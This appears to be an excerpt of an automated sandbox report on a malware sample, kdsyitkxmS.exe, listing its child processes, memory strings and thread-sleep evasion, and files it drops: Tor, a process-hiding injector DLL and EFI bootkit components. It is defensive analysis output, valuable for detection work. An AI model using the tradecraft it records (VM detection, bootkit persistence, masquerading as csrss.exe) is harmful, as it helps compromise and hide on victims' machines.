Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\kdsyitkxmS.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\rss\csrss.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\rss\csrss.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIESBAD ADDRESSBAD ARGSIZEBAD M VALUEBAD MESSAGEBAD TIMEDIVBITCOINS.SKBROKEN PIPECAMPAIGN_IDCGOCALL NILCLOBBERFREECLOSESOCKETCOMBASE.DLLCREATED BY CRYPT32.DLLE2.KEFF.ORGEMBEDDED/%SEXTERNAL IPFILE EXISTSFINAL TOKENFLOAT32NAN2FLOAT64NAN1FLOAT64NAN2FLOAT64NAN3GCCHECKMARKGENERALIZEDGET CDN: %WGETPEERNAMEGETSOCKNAMEGLOBALALLOCHTTP2CLIENTHTTP2SERVERHTTPS_PROXYI/O TIMEOUTLOCAL ERRORMSPANMANUALMETHODARGS(MINTRIGGER=MOVE %S: %WMSWSOCK.DLLNETPOLLINITNEXT SERVERNIL CONTEXTOPERA-PROXYORANNIS.COMOUT OF SYNCPARSE ERRORPROCESS: %SREFLECT.SETREFLECTOFFSRETRY-AFTERRUNTIME: P RUNTIME: G RUNTIME: P SCHEDDETAILSECHOST.DLLSECUR32.DLLSERVICE: %SSHELL32.DLLSHORT WRITESTACK TRACESTART PROXYTASKMGR.EXETLS: ALERT(TRACEALLOC(TRAFFIC UPDUNREACHABLEUSERENV.DLLVERSION.DLLVERSION=195WININET.DLLWUP_PROCESS (SENSITIVE) B (
Source: kdsyitkxmS.exe, 00000004.00000003.208202854778.0000000003A90000.00000004.00001000.00020000.00000000.sdmp, kdsyitkxmS.exe, 0000000A.00000003.208339389704.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000014.00000003.208687751303.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000017.00000003.208782822555.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000028.00000003.208837272188.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, csrss.exe, 00000032.00000003.208899557160.0000000003D00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: ... OMITTING ACCEPT-CHARSETAFTER EFIGUARDALLOCFREETRACEBAD ALLOCCOUNTBAD RECORD MACBAD RESTART PCBAD SPAN STATEBTC.USEBSV.COMCERT INSTALLEDCHECKSUM ERRORCONTENT-LENGTHCOULDN'T PATCHDATA TRUNCATEDDISTRIBUTOR_IDDRIVER REMOVEDERROR RESPONSEFILE TOO LARGEFINALIZER WAITGCSTOPTHEWORLDGET UPTIME: %WGETPROTOBYNAMEGOT SYSTEM PIDINITIAL SERVERINTERNAL ERRORINVALID SYNTAXIS A DIRECTORYKEY SIZE WRONGLEVEL 2 HALTEDLEVEL 3 HALTEDMEMPROFILERATEMULTIPARTFILESNEED MORE DATANIL ELEM TYPE!NO MODULE DATANO SUCH DEVICEOPEN EVENT: %WPARSE CERT: %WPROTOCOL ERRORREAD CERTS: %WREAD_FRAME_EOFREFLECT.VALUE.REMOVE APP: %WRUNTIME: FULL=RUNTIME: WANT=S.ALLOCCOUNT= SEMAROOT QUEUESERVER.VERSIONSTACK OVERFLOWSTOPM SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIME.LOCATION(TIMEENDPERIODTOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8520 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9036 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7864 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6976 Thread sleep count: 8562 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5028 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 980 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3480 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8868 Thread sleep count: 8504 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2032 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9076 Thread sleep count: 8214 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 9128 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8540 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2484 Thread sleep count: 8248 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6464 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6688 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8056 Thread sleep count: 8222 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2816 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6608 Thread sleep count: 7947 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5780 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe TID: 1488 Thread sleep time: -370000s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe Last function: Thread delayed
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: B:\EFI\Boot\old.efi (copy)
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent_extra-2-1-7.dll
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\libevent_core-2-1-7.dll
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Boot\EfiGuardDxe.efi
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Boot\bootx64.efi
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor-gencert.exe
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: C:\EFI\Microsoft\Boot\bootmgfw.efi
Source: C:\Windows\rss\csrss.exe Dropped PE file which has not been started: B:\EFI\Microsoft\Boot\fw.efi (copy)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8504
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8597
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8368
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8562
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8327
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8260
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8504
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8214
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8294
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8248
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8413
